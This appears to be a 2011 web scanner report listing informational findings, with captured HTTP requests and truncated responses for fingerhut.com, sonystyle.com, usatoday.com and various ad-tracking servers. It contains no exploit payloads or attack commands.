GET /fingerhut/assets/images Host: www.fingerhut.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PIPELINE_SESSION_ID |
HTTP/1.1 200 OK Server: Apache Last-Modified: Wed, 11 May 2011 13:33:48 GMT Accept-Ranges: bytes Content-Type: text/plain; charset=UTF-8 Vary: Accept-Encoding Content-Length: 1406 Date: Mon, 16 May 2011 01:37:31 GMT Connection: keep-alive ..............h.......(.. ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.fingerhut.com |
Path: | /fingerhut/css/sifr |
GET /fingerhut/css/sifr Host: www.fingerhut.com Connection: keep-alive Referer: https://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PIPELINE_SESSION_ID |
HTTP/1.1 200 OK Server: Apache Content-Type: text/html;charset=ISO Vary: Accept-Encoding Content-Length: 2618 Date: Mon, 16 May 2011 01:31:23 GMT Connection: keep-alive Set-Cookie: JSESSIONID=B2A6DA49F var bellgothicbold = { src: '/fingerhut/fonts var bellgothic = { src: '/fingerhut/fonts //sIFR.useStyleCheck = true; sIFR.fromLocal = true; // Nex ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.fingerhut.com |
Path: | /js/financial-snapshot |
GET /js/financial-snapshot Host: www.fingerhut.com Connection: keep-alive Referer: https://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PIPELINE_SESSION_ID |
HTTP/1.1 200 OK Server: Apache Content-Language: en Cache-Control: max-age=3600 Expires: Mon, 16 May 2011 02:31:18 GMT Content-Type: text/html;charset=ISO Vary: Accept-Encoding Content-Length: 5659 Date: Mon, 16 May 2011 01:31:18 GMT Connection: keep-alive var financialSnapshot = function() { $(function() { financialSnapshot.init(); }); var _p = { rColIndex : null, loadAsset : function() { if ( $( "#financialSnapshot" ).le ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.fingerhut.com |
Path: | /js/persistent_cart.jsp |
GET /js/persistent_cart.jsp HTTP/1.1 Host: www.fingerhut.com Connection: keep-alive Referer: https://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PIPELINE_SESSION_ID |
HTTP/1.1 200 OK Server: Apache Cache-Control: max-age=3600 Expires: Mon, 16 May 2011 02:31:16 GMT Content-Type: text/html;charset=ISO Vary: Accept-Encoding Content-Length: 11446 Date: Mon, 16 May 2011 01:31:16 GMT Connection: keep-alive Set-Cookie: JSESSIONID=3BBDC68C4 var persistentCartCommands = new Array(8); persistentCartCommands[0] = '/checkout/universal_cart persistentCartCommands[1] = '/checkout/add_item_pc persistentCartCommands[2] = '/che ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.fingerhut.com |
Path: | /js/sifr.jsp |
GET /js/sifr.jsp HTTP/1.1 Host: www.fingerhut.com Connection: keep-alive Referer: https://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PIPELINE_SESSION_ID |
HTTP/1.1 200 OK Server: Apache Cache-Control: max-age=3600 Expires: Mon, 16 May 2011 02:31:23 GMT Content-Type: text/html;charset=ISO Vary: Accept-Encoding Content-Length: 29365 Date: Mon, 16 May 2011 01:31:23 GMT Connection: keep-alive Set-Cookie: JSESSIONID=3D026D7D1 /************************ scalable Inman Flash Replacement (sIFR) version 3, revision 436. Copyright 2006 ... 2008 Mark Wubben, <http://nov ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.fingerhut.com |
Path: | /user/login.jsp |
GET /user/login.jsp HTTP/1.1 Host: www.fingerhut.com Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PIPELINE_SESSION_ID |
HTTP/1.1 200 OK Server: Apache Content-Type: text/html;charset=ISO Vary: Accept-Encoding Content-Length: 83965 Date: Mon, 16 May 2011 01:37:28 GMT Connection: keep-alive Set-Cookie: JSESSIONID=B5C80FAB7 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html > <head> <style type="text/css"> body { ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.sonystyle.com |
Path: | /webapp/wcs/stores |
GET /webapp/wcs/stores Host: www.sonystyle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.sonystyle.com Cookie: TS5bbf46=b8fba18f1f5 |
HTTP/1.1 200 OK Cteonnt-Length: 91796 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 91796 Vary: Accept-Encoding Date: Sun, 15 May 2011 21:22:06 GMT Connection: keep-alive Cache-Control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <!-- AllSitesHeadInclude --> <script type="text/javascript" src="//nexus2.e ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://a.tribalfusion.com |
Path: | /p.media/a3mOnI36QY5 |
GET /p.media/a3mOnI36QY5 Host: a.tribalfusion.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: ANON_ID=a5nu7qsjyDsA |
HTTP/1.1 200 OK P3P: CP="NOI DEVo TAIa OUR BUS" X-Function: 102 X-Reuse-Index: 1 Pragma: no-cache Cache-Control: private, no-cache, no-store, proxy-revalidate Content-Type: text/html Vary: Accept-Encoding Content-Length: 202 Expires: 0 Connection: keep-alive <script type="text/javascript" language="JavaScript"> var img = new Image(); img.src = "http://secure-us </script> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N3941.InviteMedia |
GET /adi/N3941.InviteMedia Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.yieldmanager User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 8329 Date: Mon, 16 May 2011 01:27:08 GMT Cache-Control: private, x-gzip-ok="" <html><head><title ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N4764.cruisecritic |
GET /adi/N4764.cruisecritic Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 5433 Date: Mon, 16 May 2011 01:34:34 GMT Cache-Control: private, x-gzip-ok="" <html><head><title <table ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N4975.1207 |
GET /adi/N4975.1207 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://dm.travelocity.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 1144 Date: Mon, 16 May 2011 01:29:31 GMT Cache-Control: private, x-gzip-ok="" <html><head><title ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N5823.DbclkAdEx |
GET /adi/N5823.DbclkAdEx Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 1281 Date: Mon, 16 May 2011 01:41:13 GMT Cache-Control: private, x-gzip-ok="" <html><head><title ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/ta.cc.com.s/deals |
GET /adi/ta.cc.com.s/deals Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cruisecritic User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 569 Date: Mon, 16 May 2011 01:28:08 GMT Cache-Control: private, x-gzip-ok="" <html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/ta.cc.com.s/disney |
GET /adi/ta.cc.com.s/disney Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cruisecritic User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 588 Date: Mon, 16 May 2011 01:20:34 GMT Cache-Control: private, x-gzip-ok="" <html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/x1.dt/dt |
GET /adi/x1.dt/dt;sz=1x1;ord Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 371 Date: Mon, 16 May 2011 01:24:40 GMT Cache-Control: private, x-gzip-ok="" <html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_top" href="http://ad ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/x1.rtb/fingerhut |
GET /adi/x1.rtb/fingerhut Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bn.xp1.ru4.com/nf? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 1173 Date: Mon, 16 May 2011 01:23:57 GMT Cache-Control: private, x-gzip-ok="" <html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 4439 Template Name = Image Banner - Open in ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://bs.serving-sys.com |
Path: | /BurstingPipe/Activi |
GET /BurstingPipe/Activi Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://www.armaniexchange User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C4=; u2=d61a92e1-c563-4003 |
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Vary: Accept-Encoding P3P: CP="NOI DEVa OUR BUS UNI" Date: Mon, 16 May 2011 01:43:14 GMT Connection: close Content-Length: 267 ebReportingImg0 = new Image(); ebReportingImg0.src = 'http://segment-pixel ebReportingImg1 = new Image(); ebReportingImg1.sr ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://cdn5.tribalfusion |
Path: | /media/1956006/frame.html |
GET /media/1956006/frame.html HTTP/1.1 Host: cdn5.tribalfusion.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: ANON_ID=aqnu7qmMZaEv |
HTTP/1.1 200 OK P3p: CP="NOI DEVo TAIa OUR BUS" X-Function: 301 Content-Length: 98 Last-Modified: Thu, 1 Jan 1970 00:00:00 GMT Content-Type: text/html Date: Sun, 15 May 2011 21:31:35 GMT Connection: close Vary: Accept-Encoding Expires: Tue, 31 Dec 2030 00:00:00 GMT Expires: Tue, 31 Dec 2030 00:00:00 GMT Cache-Control: public <script type="text/javascript" src="http://adadvisor.net |
Severity: | Information |
Confidence: | Certain |
Host: | http://content.usatoday |
Path: | /asp/uas3/uasSignedOut |
GET /asp/uas3/uasSignedOut Host: content.usatoday.com Proxy-Connection: keep-alive Referer: http://content.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SiteLifeHost=gnvm6l3 |
HTTP/1.1 200 OK Content-Type: text/html Last-Modified: Tue, 07 Dec 2010 17:57:47 GMT ETag: "801f6a413896cb1:0" Vary: Accept-Encoding Server: Microsoft-IIS/7.5 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Date: Mon, 16 May 2011 01:28:38 GMT Content-Length: 388 <div class="uasPageElement uasSignedOut"> <span class="uasGreeting">Join USA TODAY </span> <span class="uasPageControls"> <a class="uasSignIn" href="#SignIn">Sign in</a> | < ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://content.usatoday |
Path: | /asp/usataj/usatajhost |
GET /asp/usataj/usatajhost Host: content.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html Last-Modified: Fri, 13 Apr 2007 20:54:39 GMT ETag: "80519af3d7ec71:0" Vary: Accept-Encoding Server: Microsoft-IIS/7.5 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Date: Mon, 16 May 2011 01:19:46 GMT Content-Length: 345 <html><head><title>< <script type="text/javascript" src="usataj.js"></script> <script type="text/javascript"> try { parent.usatAj.HostPr } cat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://d.xp1.ru4.com |
Path: | /um |
GET /um?_r=1&_o=62795&_i Host: d.xp1.ru4.com Proxy-Connection: keep-alive Referer: http://d.xp1.ru4.com/meta User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: X1ID=AG-00000001389358554 |
HTTP/1.1 400 Bad request Server: Sun-Java-System-Web Date: Mon, 16 May 2011 01:19:57 GMT P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI" Pragma: no-cache Content-length: 147 Content-type: text/html Connection: close <HTML><HEAD><TITLE>Bad request</TITLE></HEAD> <BODY><H1>Bad request</H1> Your browser sent a query this server could not understand. </BODY></HTML> |
Severity: | Information |
Confidence: | Certain |
Host: | http://ds.addthis.com |
Path: | /red/psi/sites/travel |
GET /red/psi/sites/travel Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: loc=US%2CMjAwMDFOQVV |
HTTP/1.1 500 Internal Server Error Server: Apache-Coyote/1.1 Content-Length: 157 Content-Type: text/html Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 16 May 2011 01:28:49 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 15 Jun 2011 01:28:49 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Mon, 16 May 2011 01:28:49 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:28:49 GMT Connection: close Vary: Accept-Encoding <HTML> <HEAD> <TITLE>Error Page</TITLE> </HEAD> <BODY> An error (500 Internal Server Error) has occured in response to this request. </BODY> </HTML> |
Severity: | Information |
Confidence: | Certain |
Host: | http://f.nexac.com |
Path: | /e/a-677/s-2140.xgi |
GET /e/a-677/s-2140.xgi?na Host: f.nexac.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: na_tc=Y |
HTTP/1.1 200 OK Expires: Wed Sep 15 09:14:42 MDT 2010 Pragma: no-cache P3P: policyref="http://www Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/ Set-Cookie: na_id=20110515192708 Set-Cookie: na_lr=20110515; expires=Tue, 17-May-2011 07:33:20 GMT; path=/; domain=.nexac.com Set-Cookie: na_ps=3; expires=Wed, 15-May-2013 01:33:20 GMT; path=/; domain=.nexac.com X-Powered-By: Jigawatts Content-type: text/html Date: Mon, 16 May 2011 01:33:20 GMT Server: lighttpd/1.4.18 Content-Length: 382 <html> <head> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="-1"> </head> <body> <iframe name="__bknsframe" src="http://tags.bluekai ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://fls.doubleclick |
Path: | /activityi |
GET /activityi;src=1770367 Host: fls.doubleclick.net Proxy-Connection: keep-alive Referer: http://us.playstation.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK X-Frame-Options: ALLOWALL Server: Floodlight Date: Sun, 15 May 2011 20:26:47 GMT Expires: Sun, 15 May 2011 20:26:47 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff Content-Type: text/html Content-Length: 194 X-XSS-Protection: 1; mode=block <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR |
Severity: | Information |
Confidence: | Certain |
Host: | http://https.edge.ru4.com |
Path: | /smartserve/ad |
GET /smartserve/ad?placement Host: https.edge.ru4.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: X1ID=AG-00000001389358554 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://https Pragma: No-Cache Cache-Control: private, no-cache="Set-Cookie" Set-Cookie: ru4.1320=1#2656#0#2656=ad Content-Type: text/html Date: Mon, 16 May 2011 01:38:37 GMT Connection: close document.write("<img src=\"http://ad ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://odb.outbrain.com |
Path: | /utils/ping.html |
GET /utils/ping.html?random=0 Host: odb.outbrain.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: obuid=8212382c-a920-4555 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: obuid=8212382c-a920-4555 Cache-Control: no-cache Pragma: no-cache Accept-Ranges: bytes ETag: W/"158-1304265382000" Last-Modified: Sun, 01 May 2011 15:56:22 GMT Content-Type: text/html Content-Length: 158 Date: Mon, 16 May 2011 01:19:52 GMT <html> <head> <META HTTP-EQUIV="Cache-Control <META HTTP-EQUIV="Pragma" CONTENT="no-cache"> </head> <body> </body> </html> |
Severity: | Information |
Confidence: | Certain |
Host: | http://ping.chartbeat.net |
Path: | /ping |
GET /ping?h=blog.us Host: ping.chartbeat.net Proxy-Connection: keep-alive Referer: http://blog.us.plays User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 503 Site over allowed capacity. Server: nginx/0.7.67 Date: Sun, 15 May 2011 20:29:59 GMT Content-Type: text/html Connection: close Content-Length: 150 <HTML><HEAD> <TITLE>503 Site over allowed capacity.</TITLE> </HEAD><BODY> <H1>Method Not Implemented</H1> Invalid method in request<P> </BODY></HTML> |
Severity: | Information |
Confidence: | Certain |
Host: | http://pixel.invitemedia |
Path: | /data_sync |
GET /data_sync?partner_id=9 HTTP/1.1 Host: pixel.invitemedia.com Proxy-Connection: keep-alive Referer: http://ad.yieldmanager User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: exchange_uid="eyI0Ij |
HTTP/1.0 200 OK Server: IM BidManager Date: Mon, 16 May 2011 01:27:00 GMT P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Expires: Mon, 16-May-2011 01:26:40 GMT Content-Type: text/html Pragma: no-cache Cache-Control: no-cache Set-Cookie: dp_rec="{\"3\": 1305509220+ \"2\": 1305508826}"; Domain=invitemedia.com; expires=Tue, 15-May-2012 01:27:00 GMT; Path=/ Content-Length: 512 <html> <body> <script type="text/javascript"> makePixelRequest("http:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://serv.adspeed.com |
Path: | /ad.php |
GET /ad.php?do=html&zid=3253 Host: serv.adspeed.com Proxy-Connection: keep-alive Referer: http://www.passporte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK P3P: policyref="http://serv Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate Vary: Accept-Encoding Content-type: text/html Connection: close Date: Mon, 16 May 2011 01:20:32 GMT Server: AdSpeed/s5 Content-Length: 844 <html><head><title ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://wow.weather.com |
Path: | /weather/wow/module |
GET /weather/wow/module Host: wow.weather.com Proxy-Connection: keep-alive Referer: http://www.observertoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:19:51 GMT Server: Apache SVRNAME: web2x07 Vary: Accept-Encoding Content-Length: 5455 Content-Type: text/html if (document.getElementById && !document.getElementById( { var head = document.getElements var link = document.createElement( ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.sonystyle.com |
Path: | /webapp/wcs/stores |
NETSPARKER /webapp/wcs/stores User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.sonystyle.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive |
HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 216 Expires: Sun, 15 May 2011 21:20:12 GMT Date: Sun, 15 May 2011 21:20:12 GMT Connection: close <HTML><HEAD> <TITLE>Bad Request</TITLE> </HEAD><BODY> <H1>Bad Request</H1> Your browser sent a request that this server could not understand.<P> Reference #7. ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://6e8d64.r.axf8.net |
Path: | /mr/a.gif |
